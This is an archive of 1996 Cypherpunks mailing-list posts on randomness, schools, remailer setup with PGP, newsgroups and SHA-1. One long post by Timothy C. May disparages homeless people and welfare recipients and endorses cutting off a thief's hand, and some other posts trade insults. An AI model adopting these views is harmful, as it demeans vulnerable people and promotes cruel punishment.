From nobody at replay.com Fri Sep 27 14:40:24 1996
From: nobody at replay.com (Anonymous)
Date: Sat, 28 Sep 1996 05:40:24 +0800
Subject: Mousepad RNG's?
Message-ID: <199609271814.UAA15991@basement.replay.com>

I just downloaded a copy of the beta version of Datafellows Windows 3.1 SSH and it asked to move the mouse around to generate some randomness.

In reading Applied Crypto, it mentioned that there is no such thing as generating randomness from a personal computer unless something like a Geiger counter is used.

Is there any way to create a fairly random sample from the mouse? Should one use lots of jerky movements, or take one's time with it?

Thanks!

P.VonL.

From sophi at best.com Fri Sep 27 15:15:03 1996
From: sophi at best.com (Greg Kucharo)
Date: Sat, 28 Sep 1996 06:15:03 +0800
Subject: "Soul Catcher" Computer Chip (fwd)
In-Reply-To:
Message-ID: <199609271819.LAA01793@shellx.best.com>

I think this lends new meaning to the phrase,"been there, done that".

Greg Kucharo
sophi at best.com

From declan at eff.org Fri Sep 27 15:17:36 1996
From: declan at eff.org (Declan McCullagh)
Date: Sat, 28 Sep 1996 06:17:36 +0800
Subject: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID:

Yeah, Fairfax has good schools. But you're misrepresenting the truth: what school has the highest *percentage* of 1600 SATers, etc.

I suspect Jefferson High is larger than most private schools.
-Declan

On Fri, 27 Sep 1996, ronsimpson wrote:

> I hate to burst any bubbles but, the school with the highest number of
> National Merit Finalists and highest number of 1600 SATs is a Public
> High School (Jefferson High in Fairfax, VA)
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From azur at netcom.com Fri Sep 27 15:21:57 1996
From: azur at netcom.com (Steve Schear)
Date: Sat, 28 Sep 1996 06:21:57 +0800
Subject: Decense: What ever happened to it?
Message-ID:

I haven't seen anything on the Net since February regarding Ray Cromwell's Decense Web anonymity project. Does anybody on the list have more recent info?

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur at netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S. Lewis

"Surveillance is ultimately just another form of media, and thus, potential entertainment." -- G. Beato

From claborne at CYBERTHOUGHT.com Fri Sep 27 15:35:01 1996
From: claborne at CYBERTHOUGHT.com (Christian Claborne)
Date: Sat, 28 Sep 1996 06:35:01 +0800
Subject: San Diego CPunk Physical meeting this comming Thursday
Message-ID: <2.2.32.19960927185434.0031daf0@cyberthought.com>

<<<<< NOTE! I have a new address!!! >>>>>>

Next Thursday!!!

San Diego Area CPUNKS symposium Thursday, Oct. 3, 1996.

Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop". We discuss cryptography and other related subjects, have the special cypherpunk dinner, and unwind after a long day at the grind stone.

Don't forget to bring your public key fingerprint.
If you can figure out how to get it on the back of a business card, that would be cool. If you want the suspicious crowd there to sign your key, bring two forms of ID.

Michelle is going to bring her PGP fingerprint in for signature. Can you believe it? Hopefully Lance Cottrell will give us an update on Mixmaster and what's going on at San Diego's best ISP. You can also get the scoop on the latest development of my job situation (hint, some people are getting free eats from me on Thurs).

Place: The Mission Cafe & Coffee Shop
3795 Mission Bl in Mission Beach.
488-9060

Time:1800

Their Directions:
8 west to Mission Beach Ingram Exit
Take west mission bay drive
Go right on Mission Blvd.
On the corner of San Jose and mission blvd.
It is located between roller coaster and garnett.
It's kind of 40s looking building... funky looking (their description, not mine)

They serve stuff to eat, coffee stuff, and beer + wine.

See you there! New guy, bring your fingerprint. Drop me a note if you plan to attend...

NOTE: My primary e-mail address has changed to use my own domain. You can reach me at "claborne at cyberthought.com". Permanently replace any other address that you may have for me. I am currently not subscribed to the CP list since my current internet connection is slow (I can't afford anything right now :)

2
-- C --

    ...  __o
   ..   -\<,        Claborne at CYBERTHOUGHT.com
 ...(*)/(*)._       Providing thoughts on your computing needs.

http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint = 7E BF 38 3F 24 A7 D1 B0 54 44 96 AA 10 D0 5D 51
Avail on Pub Key server. PGP-encrypted e-mail welcome!

Dreams. They are just a "screen saver" for the brain.

From talon57 at well.com Fri Sep 27 15:37:04 1996
From: talon57 at well.com (Brian D Williams)
Date: Sat, 28 Sep 1996 06:37:04 +0800
Subject: [SUGGESTION] signal/noise ratio
Message-ID: <199609271930.MAA04776@well.com>

In the interest of those who wish a significant increase in the signal/noise ratio I make a proposal.
Significant crypto related posts could be prefaced with [CRYPTO] on the subject line on a strictly volunteer basis, that way those desiring a more topical list could have one simply by setting the appropriate filter.

Items crypto related but missing the [CRYPTO] header could be reposted by well meaning souls.

Other appropriate headers could of course be used.

Brian

From dlv at bwalk.dm.com Fri Sep 27 16:10:08 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 28 Sep 1996 07:10:08 +0800
Subject: Public Schools
In-Reply-To:
Message-ID:

"Timothy C. May" writes:
> Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS.

That's pretty obvious.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From Lsurfer at cris.com Fri Sep 27 16:12:38 1996
From: Lsurfer at cris.com (Randy Bradakis)
Date: Sat, 28 Sep 1996 07:12:38 +0800
Subject: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID:

The human formerly known as "ronsimpson " wrote:
{I hate to burst any bubbles but, the school with the highest number of
{National Merit Finalists and highest number of 1600 SATs is a Public
{High School (Jefferson High in Fairfax, VA)

Er, how about the schools with the highest percentages, not the largest number? A public school will most certainly have more students than home schools or private schools. Every home schooled child I know has a significantly better grasp on the world than any public or private schooled child. Perhaps only because their parents take a great interest in their education, but the results stand out regardless.

Cypherpunk relevance? Sure - what does the gubmint allow you to do? What information are you allowed to learn, and from what authorized sources? How are those sources authorized? Who stamps the seal of information approval upon those documents, and how do we know that the information isn't simply a 'corrected' view of history (or physics, or english language...)?
We don't, unless there are multiple channels of information to compare against, from 'signed' by experts, to pseudonymous authors, to completely anonymous authors. The only way to be certain that your children learn about the way things _really_ are, is to allow for these sources.

--
no sig too small

From tcmay at got.net Fri Sep 27 16:17:11 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 28 Sep 1996 07:17:11 +0800
Subject: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To: <9608278438.AA843856542@smtplink.alis.ca>
Message-ID:

At 1:35 PM -0500 9/27/96, jbugden at smtplink.alis.ca wrote:

>If you want to refuse those who are too stupid or anti-social from Public
>Schools in order to improve the social or intellectual climate, you better
>have
>a solution for the resulting cast-offs.

Believe me, I don't mean to be provocative (in a trolling sense), but "I have a solution."

More students should, fairly early on, be "flunked out" of courses in the "academic/professional track" and moved into _trades_. For example, the way many European countries have outstanding vocational/trade schools.

The usual trades: machinists, woodworkers, auto mechanics, technicians of all sorts, and so on. Few of these trades need, or even benefit from, courses in history, mathematics (beyond simple algebra and a tad of geometry, not the really neat stuff about proving Euclid's theorems in novel ways, the things people like me excelled in, but which left many other students shaking their heads and barely passing the class), etc. Most of the academic subjects in high school are neither needed nor remembered.

(And I reject any of the common arguments that Americans need to learn history, the Constitution, etc. Few of them remember a single word they learned, and one might as well teach the basics in earlier grades and dispense with meaningless lectures about how and when the Senate may invoke cloture, how the Foreign Powers Act modified the 1877 Trade Act, and so on.)
As I look around me, here in Santa Cruz, I see hundreds of "homeless persons." We used to call them beggars, bums, panhandlers, winos, hobos, and drifters. The people unwilling to get up in the morning for a boring job, the people unwilling to take the donations they get and buy some new clothes at the Salvation Army (I know people of both sexes who buy their business clothes at thrift shops, at huge discounts, so I reject any of the usual arguments that this won't work.)

When I see people working at Taco Bell, Burger King, gas stations, etc., and then I see the so-called "homeless," the situation is completely clear to me. And, like pigeons, if you begin feeding the beggars, you'll have more of them.

There's a further point to consider. In times past, many of the "marginal" people had other kinds of jobs. Maids, gardeners, cooks, stable boys, butlers, etc.

(I'm not saying they were all subnormal, neurotic, etc., just that many of them didn't fit into other sorts of jobs--like running the town store, raising sheep, shoeing horses, and other "professions," such as they were then--and working for others as maids and assistants of various sorts was a kind of sheltered, almost "familial," kind of employment. Shelter was often provided on-site, further aiding those who might find it hard to cope with the outside "market."

These jobs have largely gone away. Partly because houses have gotten smaller (compared to manor houses, for example), partly because of automation and other technological advances (cars, refrigerators, etc.), partly because of "egalitarian" sentiments that tend to discourage people from either hiring maids or from seeing maid service as a longterm career.
(Getting back to an earlier point, that dingbat studying "Sociology 101" and "History of Consciousness" at Valley Girl Community College is being _told_ she's headed for a professional career, despite her lack of interest in academic topics and her marginal abilities....there's no way someone like her will think seriously of such a "low-class" job as a maid! Better for her to cadge for spare change and deal some drugs on the side than do something that demeaning.)

It has also become almost impossible to find good tradespeople. Stories of good gardeners, babysitters, maids, and even roofers being "hoarded" by Marin County or Beverly Hills millionaires are only partially exaggerated. This has a lot to do with the limited supply, and also with problems of work ethic, honesty, and such things, many of which have changed rather dramatically in recent decades. Where once a worker in one's house could mostly be trusted, despite the occasional reports of items of silverware missing, today's workers are seldom to be trusted alone in the house. Horror stories abound of "home alone" workers throwing parties, rooting through the personal papers of their employers, and of robbing the houses of whatever they could carry.

And the "nanny tax" and related paperwork needed to hire a person for even a few hours worth of work has made much casual work (the "odd jobs" that drifters used to get to earn enough money to eat) almost impossible to arrange.

(Every morning there are Mexicans lined up in the parking lot of a K-Mart in a nearby town, with contractors seeking to hire temporary laborers. The contractors know all the forms to fill out, if they bother. Casual employers like me know they risk heavy fines if caught hiring "undocumented workers," or failing to dot all the "i"s and cross all the "t"s, even for a 4-hour job. So much for liberty.
For the last couple of weeks I've been hauling 70-pound stones to build a retaining wall (don't ask me about the permits I should've gotten), ripping up redwood deck boards, digging postholes for a new fence, and generally doing a couple of hours of manual labor every day. While it has its advantages, in earlier days I could've counted on providing some employment for someone who today is "a homeless person." No more. They're not psychologically prepared to do a solid (if unspectacular) job, as they've been taught for all of their lives that they went through high school and maybe a couple of years of college (and maybe more) so they could join the professional ranks....when they see they really won't be joining the professional ranks, and that they really don't want to make the sacrifices to, they have nothing to fall back on.

So, in the "olden days," the social bargain was this: I'd spend some of the money I'd accumulated in whatever manner I had and exchange it with some of the tradespeople or laborers for their labor. A fair deal for both.

Now, we've got trash littering our highways, but nobody thinks seriously of having prisoners pick it up (the "chain gangs" when I was a kid), or having "welfare mothers" out picking it up, or having day laborers do the work. Ditto for all sorts of other "infrastructure" work that's needed.

(I knew someone married to a honcho in CalTrans, the California Department of Transportation, responsible for the freeways. He confirmed that "cheap labor" is barred, by various union contracts negotiated over the years, and that the starting pay for CalTrans workers is $30K a year...probably more by now.
So, "homeless people" are sitting around begging for spare change and harassing passersby, welfare mothers are collecting welfare, AFDC, food stamps, and WIC money for doing nothing except their specialty (as someone noted, "welfare-powered bastard factories"), University of California "History of Consciousness" (yes, a real major) graduates are waitressing tables at local Santa Cruz restaurants (because they can't find employers who want a "HofC" graduate, as with so many worthless majors), all the while CalTrans is hiring "transportation engineers" for far-more-than-market prices to pick up trash on highways. Anybody still think things are not out of whack?)

My conclusion is simple: Tell people if they don't work, they won't eat. If they do something others are willing to give them money to do, they won't get money. They won't get "entitlements" from the government (= taxpayers, = those who are working, = me and thee).

Tell them that a college education should only be pursued if one has a "calling" to be an engineer, a programmer (and probably not even that, judging by what I see), a doctor, a lawyer (on second thought, don't ever suggest they become lawyers), and so on.

And make it easier to hire people, instead of harder.

(And if one hires a maid, and the maid steals, cut off her hand. We've lost sight of justice, and people think that ripping off the rich is their kind of justice. This needs to change.)

Even liberals are beginning to understand the "game theory" aspects. Like pigeons, if you feed them, you'll have more bums, winos, addicts, drifters, and beggars. If you give people money when they have babies, whether they are working or married, they'll drift into having more babies. (Not as a carefully-considered choice, but for a variety of systemic, psychological, game-theoretic, and "path of least resistance" reasons.)

Psychologists and similar psychobabblers call it "tough love."
If one always "enables" an addict, a layabout, a shiftless worker, with excuses and handouts, the behavior does not change. To save a person, sometimes harshness is needed. This is why crypto anarchy's starving of the tax system is good. It may "kill" some number of people, as nearly any new idea does, but ultimately it will put things back on track. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From attila at primenet.com Fri Sep 27 18:18:04 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 09:18:04 +0800 Subject: In defense, sort of, of Phill Hallam-Baker In-Reply-To: Message-ID: <199609272142.PAA14851@InfoWest.COM> you are absolutely right, as difficult as it is to remain passively disengaged from annoying mosquitos.... wrong: sorry Phill for my criticisms, but you're still fucking clueless... right: -- "To what do you owe your success in acting?" "Honesty. Once you've learned how to fake that, you've got it made." From unicorn at schloss.li Fri Sep 27 18:28:22 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 09:28:22 +0800 Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer? In-Reply-To: <199609270540.XAA21446@InfoWest.COM> Message-ID: I do not currently have an active practice in the United States. Should a project come along within those boarders which interests me, that might change. I do not foresee that happening however. 
-- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From markm at voicenet.com Fri Sep 27 18:29:51 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 28 Sep 1996 09:29:51 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: <199609270522.WAA14373@abraham.cs.berkeley.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 26 Sep 1996, John Anonymous MacDonald wrote: > This sounds like a good idea. I would certainly vote for such a news > group. Should the name be misc.anonymous or misc.anonymous.messages? > Are alt.anonymous and alt.anonymous.messages basically two different > newsgroups for exactly the same purpose, or is there some difference > between them. This is what's listed in the newsgroups file: alt.anonymous alt! Who goes there? alt.anonymous.messages An anonymous message pool newgroup, whatever that is. Alt.anonymous is just another content-free, basically dead newsgroup. Alt.anonymous.messages is the group used for message pools. Since the general rule for naming newsgroups is to use dots only for designating a lower group hierarchy, misc.anonymous-messages is probably a better name, since there is no misc.anonymous.* newsgroup hierarchy. Mark - -- PGP encrypted mail preferred. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From attila at primenet.com Fri Sep 27 18:34:34 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 09:34:34 +0800 Subject: active practice in America In-Reply-To: Message-ID: <199609272225.QAA15967@InfoWest.COM> In , on 09/27/96 at 05:51 PM, Black Unicorn said: I do not currently have an active practice in the United States. Should a project come along within those borders which interests me, that might change. I do not foresee that happening however. I presumed that --it's a plus! I never did, and never will. the research and the smell of blood (if channeled to real justice) is immensely satisfying --it is the members of the American club, and the intendent body trading which turns my stomach --that, and 'kill' based compensation. the difference in civil v. common law origined justice is not the code... to put it another way: in criminal proceedings: I would rather be considered guilty, until proven innocent; than I would be presumed innocent, until proven guilty beyond a reasonable doubt. a nation which can base a conviction on conspiracy to commit a crime, or permits circumstantial evidence to close the gap towards 'beyond a reasonable doubt,' has lost any pretense of understanding the heritage of common law: the Magna Carta. -- Of course the US Constitution isn't perfect; but it's a whole lot better than what we have now. 
From jimbell at pacifier.com Fri Sep 27 18:41:20 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 28 Sep 1996 09:41:20 +0800 Subject: Internet plug pulled on Colombia's guerrillas Message-ID: <199609272133.OAA11948@mail.pacifier.com> At 03:05 PM 9/26/96 -0700, Chris Adams wrote: >Internet plug pulled on Colombia's guerrillas > 3:05pm EDT, 9/26/96 >BOGOTA, Colombia - A Colombian guerrilla group currently >involved in a bloody offensive in the mountains and jungles, >suffered a setback in its propaganda battle when its new-tech >voice on the Internet was mysteriously silenced. > >The Revolutionary Armed Forces of Colombia (FARC), which >has periodically paralyzed half the country with road blocks, >found its route to the information superhighway barred. > >The Communist insurgents, who rose up in arms in 1964, >embraced new technology last year in their fight to overthrow the >government by launching a home page on the Internet. I couldn't resist smiling when I read this. Not that I want their access cut; quite the opposite. But it is REALLY reassuring to see the authorities behave in exactly the fashion you expect them to! Attempting to cut off dissenting political voices IRL is de rigueur; now, this shows that they believe the "threat" to the government posed by allowing others to voice contrary opinions on the 'net is real. Jim Bell jimbell at pacifier.com From markm at voicenet.com Fri Sep 27 18:42:55 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 28 Sep 1996 09:42:55 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 27 Sep 1996, Robert Hettinga wrote: > It seems that if newsgroup RFC and the whole rigamarole of newsgroup voting > was set up, there would be enough people -- on this list alone, probably -- > who would be interested enough in the idea to at least vote (publicly) > for it. I certainly would, just to see what happens. 
> > Of course, that means that someone *else* ;-) has to actually put the train > on the track, much less lay the rails, which, as usual, is the main problem > here. If we had some ham, we could have some ham and eggs, if we had some > eggs. If you lived here, you'd be home now. And so forth. > > Same as it ever was. You're forgetting that "Cypherpunks write RFD's". I'll write up a formal Request For Discussion in my copious spare time. I have no experience in the newsgroup creation process, but it is well documented in the news.announce.newgroups FAQ's. Mark - -- PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From mccoy at communities.com Fri Sep 27 18:43:15 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 28 Sep 1996 09:43:15 +0800 Subject: [NOISE] Re: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: Lsurfer at cris.com (Randy Bradakis) wrote: >The human formerly known as "ronsimpson " wrote: >{I hate to burst any bubbles but, the school with the highest number of >{National Merit Finalists and highest number of 1600 SATs is a Public >{High School (Jefferson High in Fairfax, VA) > >Er, how about the schools with the highest percentages, not the largest >number? A public school will most certainly have more students than >home schools or private schools. Well, even then you are probably going to have a tough time making your argument. 
Public "magnet" schools and other public schools which target the top flight students in major metropolitan areas will usually have a very high percentage of such students because they are able to "cherry pick" the ones they want (and avoid dragging down averages with students whose parents have "pull" that some private schools must deal with.) If you take the percentages for a school district or other large geographic area which covers several schools you will probably end up with a better comparison. Then again, even with such a geographic comparison you may not end up with the results you seem to want. In certain areas of the US the public schools are excellent (generally the Midwest judging from published surveys of test results and other somewhat meaningless tests :) and in some areas the public schools are horrific. Making broad claims regarding which types of education are good and which are bad is often a fool's errand.... jim From hallam at ai.mit.edu Fri Sep 27 18:43:43 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Sat, 28 Sep 1996 09:43:43 +0800 Subject: In defense, sort of, of Phill Hallam-Baker In-Reply-To: <52h5cl$5v4@life.ai.mit.edu> Message-ID: <324C56AE.794B@ai.mit.edu> Robert Hettinga wrote: > However, I also think that Phill has this passion for order that sometimes > borders on the pathological. Maybe because, like Bertrand Russell (who > Phill and I both admire) says, romanticism, leftism and communism are > basically feudalism in disguise, and Phill's a closet aristocrat. ;-). > Maybe not. Of course socialism is grounded in paternalism. Robert Owen, its founder was in his day the equivalent of Steve Jobs, an extremely rich and successful merchant who considered that wealth also implied responsibility. > I think what we see as his blustering trolls on this list come from > passion. But, I don't think they're trolls at all. I think they show, more > often than not, his outrage at the way the world's going to go. 
Which, > obviously, is *our* way, and not his. He knows very well the power of the > technology we talk about here, and deep down, I think he knows we're right. If people want to have a sensible discussion about technology and policy then I think that keeping the discussion grounded in reality is a good thing. I don't think that the political situation is going in a libertarian direction, quite the opposite. I see technology as having greatly increased the power of government and that it will be necessary to institute checks and balances to make it work. I also think that you are being very naive with regards to the threat posed by corporations to individual liberties. I see no reason to distinguish between corporate intrusions and state intrusions except in one respect. If we can't find a way to make society work without some form of intrusion the agency that is responsible has to be under democratic control. I think that unless the case for privacy is put in a way which society at large accepts then Freeh and the corporations will win. HMOs will be touting people's medical records on the open market (many already do), employers will vet employees on the basis of reports drawing on information on video rentals and so on. I certainly don't agree with Denning or Sternlight. Sternlight is either a fool or an invention of the NSA. Denning bases her argument against crypto on hidden sources. I know my experience in the area concerned to be significantly greater than hers since if she had operational experience she would say so. Phill From unicorn at schloss.li Fri Sep 27 18:47:20 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 09:47:20 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Timothy C. May wrote: > At 1:37 PM -0400 9/26/96, Black Unicorn wrote: > > >> > >> b. 
evidence that the "confession" can be backed up by other evidence > >> > > > >In the case of the export at hand, a passport record exists, and surely > >the notebook exists. Were I a prosecutor with a bug in my rectum, I would > >think I had something of a case. > > What evidence of any sort do they have that any particular notebook > computer was involved in the trip offshore? Seems to me this is a rather > major defect in the evidence chain. His admission that he used the notebook. Recovering the notebook and finding the software. Interviewing the Customs agent working at the time. Considering the headaches required for airline travel today, it's not like there aren't serious records abound. For crying outloud, he admitted to the world that he took the software out. I put that in front of a jury and it looks just like the typical stupid bragging criminal. Any defense about "I was just kidding" or "The message was forged" might be interesting, but it will sound like technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a reasonable doubt, but a jury is very unlikely to buy it. Juries almost never buy things they don't understand. Technical talk makes them sleepy. "Can't we go back to the hotel now? Dey gots good eatings." > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." 
> > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Fri Sep 27 18:58:42 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 09:58:42 +0800 Subject: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: On Fri, 27 Sep 1996, ronsimpson wrote: > I hate to burst any bubbles but, the school with the highest number of > National Merit Finalists and highest number of 1600 SATs is a Public > High School (Jefferson High in Fairfax, VA) As a former Fairfax resident I can tell you that the reason the school performs so well is because of the immense income from local property taxes, and because the Fairfax school system has taken great pains to maintain autonomy and freedom from the public school system at large. They have managed, quite effectively, to create a private school that receives public funds and keeps out interlopers. They have my admiration for this task. I can also point out that everyone in the Greater D.C. area is trying to get their kids into the various Fairfax schools. Some resort to lying to the DMV about their address to do so. It is a measure of the clout of the Fairfax school system that a few complaints have triggered a crackdown on district monitoring which (surprise surprise) is concentrated in Fairfax. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From paul at fatmans.demon.co.uk Fri Sep 27 19:10:40 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sat, 28 Sep 1996 10:10:40 +0800 Subject: Possible subs attack???? Message-ID: <843834821.2722.0@fatmans.demon.co.uk> > whose list is this, and why am I on it? Please delete my name > now. 
I have noticed a lot of these messages on the list over the last day or two, I can only assume Vilus/Detweiller/Some other troublemaker has decided to subscribe a few people using fake return addresses, anyone else got any ideas on what else could have caused people to be subscribed? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From um at c2.net Fri Sep 27 19:37:12 1996 From: um at c2.net (Ulf Moeller) Date: Sat, 28 Sep 1996 10:37:12 +0800 Subject: quotation Message-ID: Found in a sig file: "The people involved in the crypto debate are all intelligent, honorable and pro-escrow, but they never possess more than two of these qualities at once." -- Kenneth Neil Cukier (100736.3602 at compuserve.com) From wmono at Direct.CA Fri Sep 27 19:38:04 1996 From: wmono at Direct.CA (William Ono) Date: Sat, 28 Sep 1996 10:38:04 +0800 Subject: [NOISE] Re: Jena Remailer In-Reply-To: <199609271630.JAA24185@sirius.infonex.com> Message-ID: My apologies in advance to the list for this noise. Dear Anonymous, if there is another way to contact you, please let it be known so that this need not involve the 1500 others on the list. On Fri, 27 Sep 1996, Mixmaster wrote: > OK, it's an improvement, but there's still some obscurity and a couple > of other problems: > w> * The hexadecimal key-ID forms the Email address. For example, > if the nym's key is 0x01020304, the address will be: > anon-01020304 at as-node.jena.thur.de > > Already a confusion: Is not the address pseudonym at as-node.jena.thur.de? No, it's not. 
"the address will be: anon-01020304 at as-node.jena.thur.de" implies that the address will be anon-01020304 at as-node.jena.thur.de > And, since the key ID is an eight-digit hex number, why the confusing > > "...if the nym's key is 0x01020304, the address will be:" > ^^ > ...or am I missing something already? 0x is used to indicate that the characters that follow are in hexadecimal. > w> * The user-ID of the key contains the pseudonym, only. Note: > This is different from the convention, which is to include the > Email address in angle brackets. > > OK, so if I understand this properly, when prompted for an account name > in PGP one simply enters > > pseudonym > > ...with no quotes or address ("pseudonym" ). Exactly. Just the pseudonym. Remember that at this point, you do not know what your pseudonymous address will be, because the keys have not been generated. > w> * Subject: (or Anon-Subject:) [deletia] > The header fields in parens are identical in function or not? Yes, identical in function. To: bill at macrosquash.com is the same as Anon-To: bill at macrosquash.com > w> - Run 'pgp -esa -u "pseudonym" anon at as-node anonid.asc' to sign and > w> encrypt the extracted key for the server. > > These various command lines in the helpfile do not work in the pre-legal > PGP 2.6/uix/ui versions preferred by many, though equivalent command > lines of course exist. I use PGP 2.6.2 as distributed by MIT. The command line in my re-written help file works for my copy of PGP. The command line in the original help file apparently works for the international edition, although I am not able to confirm this. > The procedure didn't produce results for me so far, but before trying > again I wish to get confirmation that I am trying properly: > 1: Generate key with simple, one-word pseudonym, no quotes, no > address, no nothing. Multiple words work fine, but yes, that should be fine. 
> 2: Generate -kxa keyfile, pseudo.asc > > 3: -esa encrypt keyfile with Jenaer Remailer's PGP key and send > to anon at as-node.jena.thur.de via a remailer. Yes, that is correct -- be sure that you are signing with your nym's key, and not your own. Also be sure that the remailers you are using are functional. > 4: Account is automatically established and should work > immediately. As soon as the mail arrives, that is correct. If it was lost by using a non-operational remailer, or by sending a misformatted mail, then it will not. > To test... > > 1: Prepare message textfile according to sample: > > Newsgroups: de.test > Subject: Test > > This is the test message textbody... Correct. All of this should be starting at column 0, with no indentation. > 2: PGP encrypt the filebody and two header lines with the Jenaer > Remailer's key using the -esa command, signing the cyphertext > with your key previously sent to the remailer. > > 3: Send the resulting cyphertext message to the Jenaer Remailer > via another remailer, making sure to avoid command words in > the Subject: field of the outgoing message. > > As I say, following these protocols I have not yet seen a resulting > message in the test group I have chosen. Do you feel this is due to > lag, or am I doing something obviously wrong? It may be lag, it may not be. I recommend that you create a test nym, with minimal anonymity (no remailers, send everything directly to jena) and, after waiting several hours to ensure that the key was added, send a mail from your nym to your own account. If you get no mail after several hours, something is wrong. > w> - Never request a delivery to your real Email address. > > So here's what I really want to know: When/if the new account is up and > running, how _does_ one discreetly retrieve his mail? 
I don't see how, > other than to have it sent to alt.anonymous.messages via a mail2news > netmail address such as alt.anonymous.messages at news.demon.co.uk and then > pick through the mess there until some cyphertext message responds to > his right key. That's exactly right. We need better message pools. Actually, what is needed is an email message pool, because of the lag and uncertainty of Usenet. But that's a project for another day. hth. -- William Ono PGP Key: F3F716BD fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint PGP-encrypted mail welcome! "640k ought to be enough for everybody." From steve at edmweb.com Fri Sep 27 19:43:47 1996 From: steve at edmweb.com (Steve Reid) Date: Sat, 28 Sep 1996 10:43:47 +0800 Subject: Public domain SHA-1 in C Message-ID: Thanks to Eric Young's suggestions, my SHA-1 is now _very_ fast. If you downloaded the older version (before 5:30pm Pacific time) you'll probably want to download the new-and-improved version. http://www.edmweb.com/steve/sha1.c ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. 
